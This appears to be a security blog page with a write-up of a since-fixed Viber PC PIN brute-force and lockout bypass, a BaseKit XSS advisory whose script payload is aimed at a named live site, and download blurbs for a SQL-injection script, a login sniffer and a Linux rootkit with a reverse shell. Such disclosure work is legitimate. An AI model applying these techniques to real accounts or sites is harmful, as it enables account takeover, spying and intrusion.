Spy to Viber users (authentication bug) [solved]

Edited: I informed Viber on 26/06/2013 and they solved the bug in less than 12 hours.

Viber PIN Activation PCA few days ago I thought of analyzing some applications for mobile instant messaging, to see if they had security bugs. Initially my intention was to look for on the PC versions of Line and Viber, and I started by the latter.

Analyzing the authentication process PC application of Viber I found several security flaws that allow to guess the PIN that gives access to Viber account from the computer with all that this implies: spying conversations in real time (images sent included), spy call history, impersonate, and access to address book. All this without the “victim” being aware practically nothing: receives only once a message on Viber (mobile) with a PIN.

More or less the authentication process is as follows …

Install Viber application for PC and at run it asks if you have a mobile (no matter the platform) with Viber installed. You say yes and it asks the mobile number, write it and Viber will send a message to mobile Viber app with a 4-digit PIN, which you must write on PC application and you will have Viber authenticated on your computer. The first error is clear: a 4-digit PIN?, is totally inadequate from the point of view of security.

Internally what the application after entering your mobile number on the PC (first step) does is to generate a string (pseudo)random of 40 characters long that will be used later as a key to identify your Viber account. This is made by the program itself without talking to the server, with the following HTTPS request:

<RegisterUserRequest>
    <PhoneNumber>660100200</PhoneNumber>
    <PushToken></PushToken>
    <CountryIDDCode>34</CountryIDDCode>
    <UDID>27b828c2768a7d7b65cg7dced6icb2aa90420c29</UDID>
    <DeviceType>Desktop</DeviceType>
    <SystemVersion>NT6.1</SystemVersion>
    <System>Windows</System>
    <ViberVersion>3.0.1</ViberVersion>
    <SecondaryDevice>1</SecondaryDevice>
</RegisterUserRequest>

If you intercept the UDID (on your computer), then you can calculate the PIN that has reached the Viber application on mobile. Each time the PC application attempts to validate a PIN is making an HTTPS request as follows:

<ActivateUserRequest>
    <UDID>27b828c2768a7d7b65cg7dced6icb2aa90420c29</UDID>
    <ActivationCode>1234</ActivationCode>
    <ProtocolVersion>14</ProtocolVersion>
    <System>Windows</System>
</ActivateUserRequest>

It re-uses the UDID, and it tries to validate the PIN 1234. Viber (server side) has a protection that if you put the wrong PIN 3 times the system blocks, the problem is that you can jump it. Probably because the system uses a MySQL database and the UDID is stored in a field of type VARCHAR (or other non-binary), the comparison no distinction if you add blank spaces at the end of the UDID or if you change a lowercase/uppercase. Therefore, with this little trick you can send many more attempts and not just 3.

The UDIDTesting PIN Viber that server accepts has a maximum length, so you can not add spaces to infinity. But considering that server accepts 3 attempts per UDID, you can add enough blank spaces (over 300) and you can play with lower / upper case: the result is that as long as the UDID has 8 letters is enough to reach the UDID 9000 different combinations to test all possible PINS (in the tests I’ve done always generates a UDID with more than 8 letters).

I made a small little program that tests all PINS, from 1000 to 9999, takes just under 2 hours to try them all. Once the PIN and a key is returned by the server, you have to intercept the request does Viber for PC and modify the response with a proxy like Burp Suite (the PIN is invalid since you’ve already validated previously with the request to see if it was correct). Once this is done you get full access to Viber account from your computer.

Should be noted that Viber on PC will not retrieve messages and call history made before that moment, but it will start to sync from then on.

BaseKit bug XSS Advisory

I contacted BaseKit.com company 45 days ago to warn about a bug XSS (Cross Site Scripting) in their systems. They told me that in 15 days it would be solved, but have passed 45 days and the error still exists, so I’ve decided to publish it.

BaseKit.com is a company that sells a service for creating online websites easily with a visual editor. On their website they advertise that have been created 228,000 web pages using their system.

Their system uses HTTP rewrite module, and therefore never reached an HTTP error number 404. All URL’s are injected into the source code as follows:

<link rel=”stylesheet” type=”text/css” href=”http://DOMAIN.COM/PATH?startcss=true” />

PATH is not filtered in any way, so you can put HTML code in URL and it will be copied to source code.

For example, with a URL as:

http://DOMAIN.COM/”><script>alert(document.cookie);</script>

It will be copied as:

<link rel=”stylesheet” type=”text/css” href=”http://DOMAIN.COM/”><script>alert(document.cookie);</script>?startcss=true” />

So you can execute javascript code.

On their website BaseKit.com you can see examples of pages created with your system, you can check the bug in a real website with next link:

http://www.instalcesped.com/”><script>alert(document.cookie);</script>

Paper about exploiting web vulns

Pepelux has wrote a paper about exploiting web vulnerabilities to gain access to the system.

There are a lot of vulnerabilities that allow us to exploit a website, all of them are old and documented. We can found LFI, RFI, SQL, XSS, SSI, ICH and other attacks. For that reason this paper is centered only in attacks that allow us access to the system and to execute commands remotely.

Download (English) | Descargar (Castellano)

BlindSQL v1.0

Pepelux has made a bash script to make blind attacks SQL injection again databases, usually MySQL. It attacks with bruteforce gaining configuration data, tables, fields and data from DB. It uses lynx navigator.

Download

[eNYeSec] Monitor v1.0

Pepelux has made a windows utility to capture all traffic from net card, as a sniffer (promiscuous mode). It is configurable with filters, and captures TCP, UDP, ICMP and ARP protocols. It can export data, and has a login plain text detection mode (ftp, pop3, etc.). It is multilanguage (english + spanish).

Download | See screenshot

Playing with sockets (port scan)

Pepelux has wrote a paper about port scanning at low level. It explains anonymous port scan, playing with net packet headers using raw sockets. It shows most used scan techniques (xmas, fin, etc.), through own raw sockets code and examples. It also explains a little about SO’s detection.

Download (English) | Descargar (Castellano)

eNYeLKM v1.1

LKM rootkit for Linux x86 with the 2.6 kernel. It inserts salts inside system_call and sysenter_entry handlers, so it does not modify sys_call_table, or IDT content. It hide files, directories, and processes. Hides chunks inside of files, gives remote reverse_shell access, local root, etc.

Download LKM

English web version

You are reading the english version from enye-sec.org web :).

We will try to translate into english everything that we make (papers, programs, exploits, etc.). We had translated some programs / exploits, that you can find on english web version. We will try to translate old papers, and in the future we will (try) translate everything.

Our english ( specially mine :-S ) is not very good, sorry for it.

eNYe Sec  |  Computer Security · Green Hope Theme by Sivan & schiy · Powered by WordPress